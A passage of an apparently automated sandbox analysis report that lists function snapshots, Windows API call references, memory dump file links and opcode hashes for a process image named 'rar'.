                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 4141327611-0
                                                                                                                                                                                                                                                                    • Opcode ID: e7bd9680fa6b4193e921ea7abc60155107c03bf2766982dd05110af1441b6c30
                                                                                                                                                                                                                                                                    • Instruction ID: cad716aa996f99d4572039a28602682cf5acc0d0c1812a032ea02f73be5dad77
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e7bd9680fa6b4193e921ea7abc60155107c03bf2766982dd05110af1441b6c30
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 60415122A0E78246FB758B50D044379B7E1EF40F98F1462B0DA4987AD9DF3CEC498748
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,00007FF695CD86CB,?,?,?,00007FF695CDA5CB,?,?,00000000,?,?,00000040,?,?,00007FF695CD2DF9), ref: 00007FF695CED09D
                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,00007FF695CD86CB,?,?,?,00007FF695CDA5CB,?,?,00000000,?,?,00000040,?,?,00007FF695CD2DF9), ref: 00007FF695CED0E5
                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,00007FF695CD86CB,?,?,?,00007FF695CDA5CB,?,?,00000000,?,?,00000040,?,?,00007FF695CD2DF9), ref: 00007FF695CED114
                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,00007FF695CD86CB,?,?,?,00007FF695CDA5CB,?,?,00000000,?,?,00000040,?,?,00007FF695CD2DF9), ref: 00007FF695CED15C
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                                                                                                    • Opcode ID: 3c41f03ffe9be2f80d80ab2a91f405bd887f89bc1d7d9ea25aa0d2314948d83b
                                                                                                                                                                                                                                                                    • Instruction ID: aca1661237014b6d9b3af60380c95a0e9c9888183f907f1e8ef1afa319a3b334
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3c41f03ffe9be2f80d80ab2a91f405bd887f89bc1d7d9ea25aa0d2314948d83b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B314932618B4582E7708F11E5557AA77E0F789BA8F505329EEAC47BC8CF3CD8488B44
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF695D33CEF,?,?,00000000,00007FF695D33CAA,?,?,00000000,00007FF695D33FD9), ref: 00007FF695D397A5
                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF695D33CEF,?,?,00000000,00007FF695D33CAA,?,?,00000000,00007FF695D33FD9), ref: 00007FF695D39807
                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF695D33CEF,?,?,00000000,00007FF695D33CAA,?,?,00000000,00007FF695D33FD9), ref: 00007FF695D39841
                                                                                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF695D33CEF,?,?,00000000,00007FF695D33CAA,?,?,00000000,00007FF695D33FD9), ref: 00007FF695D3986B
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1557788787-0
                                                                                                                                                                                                                                                                    • Opcode ID: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
                                                                                                                                                                                                                                                                    • Instruction ID: a3d005d398edc2373c4d8a22e4a39977feedd0f537c9472104173cc64dc934f7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FC217321F1879182EA308F12A44012AA6E4FF84FD4F485375DE9EA7BD4DF3CE8568748
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,?,?,00007FF695CF11B0,?,?,?,00000000,?,?,00007FF695CEF30F,00000000,00007FF695CD6380,?,00007FF695CD2EC8), ref: 00007FF695CF3AC4
                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,?,?,00007FF695CF11B0,?,?,?,00000000,?,?,00007FF695CEF30F,00000000,00007FF695CD6380,?,00007FF695CD2EC8), ref: 00007FF695CF3B0A
                                                                                                                                                                                                                                                                    • DeviceIoControl.KERNEL32 ref: 00007FF695CF3B55
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,00007FF695CF11B0,?,?,?,00000000,?,?,00007FF695CEF30F,00000000,00007FF695CD6380,?,00007FF695CD2EC8), ref: 00007FF695CF3B60
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CreateFile$CloseControlDeviceHandle
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 998109204-0
                                                                                                                                                                                                                                                                    • Opcode ID: eff6c290fb367c5b76febf0d76c2ae076eb862a10f6af346eafb357c39462c7d
                                                                                                                                                                                                                                                                    • Instruction ID: b09a002cdf9da9aaf431ca9dd14922c82405b46b7c18984d36d1810c512612ea
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eff6c290fb367c5b76febf0d76c2ae076eb862a10f6af346eafb357c39462c7d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C318F32618B8186E7708F11B4446AAB7A4FB88BE4F011335EEA953BD4DF7CC9598B04
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentPriorityThread$ClassProcess
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1171435874-0
                                                                                                                                                                                                                                                                    • Opcode ID: bb35a308c9672c43725447ff3ecbbf89940673d79f69deb8a20185b15c97b697
                                                                                                                                                                                                                                                                    • Instruction ID: 206e28a5e18cd5db6a79009cb142b3a57b28c18e6b64d22d68213f24ba934d5d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bb35a308c9672c43725447ff3ecbbf89940673d79f69deb8a20185b15c97b697
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE110C72A196428FF6788B11E48427C62E1EB84F44F6062B5D70A97695EF2CBC4D4748
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast$abort
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1447195878-0
                                                                                                                                                                                                                                                                    • Opcode ID: bc6db4589d12c74431344df6db0fda3963e5f3476a1a0d6bb2a5a407689805e6
                                                                                                                                                                                                                                                                    • Instruction ID: 95f2ea7dbfe6165507ceffb4222dabab0ba1c89b2016b8a8cb7ad529e88983d1
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bc6db4589d12c74431344df6db0fda3963e5f3476a1a0d6bb2a5a407689805e6
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D014C20B0960342FE78A771AA5917816D1CF48F88F1467B8DD1ECB7D6ED3DAC498648
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CloseHandleReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 502429940-0
                                                                                                                                                                                                                                                                    • Opcode ID: 8563909dc3f60491a00452f33658f3f2e850a11d725ac5753c43192e2d1258eb
                                                                                                                                                                                                                                                                    • Instruction ID: 440647ee96786f551c7737fc7b9c97bba31ec94a1ef144fbfdcae318c800ef94
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8563909dc3f60491a00452f33658f3f2e850a11d725ac5753c43192e2d1258eb
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C118232614A41D7E2249F20E544669A3B0FB85FA0F001331DBAD576E5CF39E8B9C748
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID: gfffffff
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-1523873471
                                                                                                                                                                                                                                                                    • Opcode ID: 21452402729b0f04a42bea99b9d48ecd324c6ba459a3d9785fd7d0df1cc262de
                                                                                                                                                                                                                                                                    • Instruction ID: 4fe5e91d6659b11fafb12ec2c4b18e7526eaab5381830f660aabc97d15361308
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 21452402729b0f04a42bea99b9d48ecd324c6ba459a3d9785fd7d0df1cc262de
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8912862B093C686EB358F2591803BC6BD5EB26FD4F04A271CA8D87395DE3CE919D305
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF695D1B6D0: Sleep.KERNEL32(?,?,?,?,00007FF695CECBED,?,00000000,?,00007FF695D17A8C), ref: 00007FF695D1B730
                                                                                                                                                                                                                                                                    • new.LIBCMT ref: 00007FF695D0CFD9
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                                                                                                                    • String ID: rar$rev
                                                                                                                                                                                                                                                                    • API String ID: 3472027048-2145959568
                                                                                                                                                                                                                                                                    • Opcode ID: dcef9068b42a9893c7f4a7cadf32c303cffa6ff2c452e1383d41a9728c4e1a7d
                                                                                                                                                                                                                                                                    • Instruction ID: 795b37d4f7cbb929c278dd21fd22400a9dc2941b3a7b80c8644e471339e57cf6
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dcef9068b42a9893c7f4a7cadf32c303cffa6ff2c452e1383d41a9728c4e1a7d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C6A1CF22A0968282EA30EB30C4542BD63E5FF44F84F5562B7DA5D8B6D6DF2CED48C345
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID: *
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-163128923
                                                                                                                                                                                                                                                                    • Opcode ID: 16a705be2b1e487b59333a8e93db6455a755c474a96de4fc0b7d69b7c81f417b
                                                                                                                                                                                                                                                                    • Instruction ID: 5fd3eba5d177987e1e19a2d189fed53c7b3bef8177a03d4c7bdce94e1c4f7fa6
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 16a705be2b1e487b59333a8e93db6455a755c474a96de4fc0b7d69b7c81f417b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B3716072908617C6E7788F24804603C7BE0FB45F48F2427B6DA5AC2294EF39DD8AC709
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
